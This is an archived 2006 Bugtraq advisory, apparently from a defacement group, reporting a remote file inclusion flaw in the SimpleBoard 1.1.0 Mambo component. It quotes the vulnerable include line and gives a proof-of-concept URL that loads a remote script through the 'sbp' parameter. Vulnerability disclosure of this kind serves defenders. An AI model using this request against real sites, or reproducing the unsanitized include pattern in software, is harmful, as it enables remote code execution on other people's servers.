SimpleBoard Mambo Component 1.1.0 Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SimpleBoard Mambo Component 1.1.0 Remote File Include
From: stormhacker@xxxxxxxxxxx
Date: 9 Sep 2006 22:55:55 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[W]orld [D]efacers Team

======================================

--------------------Summary----------------

eVuln ID: WD23

Vendor:  SimpleBoard Mambo Component 1.1.0

Vendor's Web Site: mamboxchange.com/projects/simpleboard

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS (worlddefacers.de)

-----------------Description---------------

require_once("$sbp/sb_helpers.php");


--------------PoC/Exploit----------------------

http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_script]

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

Prev by Date: Re: Re: Sql Injection and Path Disclosoure Wordpress v2.0.5
Next by Date: ConSec Symposium - Sept 20-22 in Austin, TX
Previous by thread: [SECURITY] [DSA 1172-1] New bind9 packages fix denial of service
Next by thread: Re: SimpleBoard Mambo Component 1.1.0 Remote File Include
Index(es):
- Date
- Thread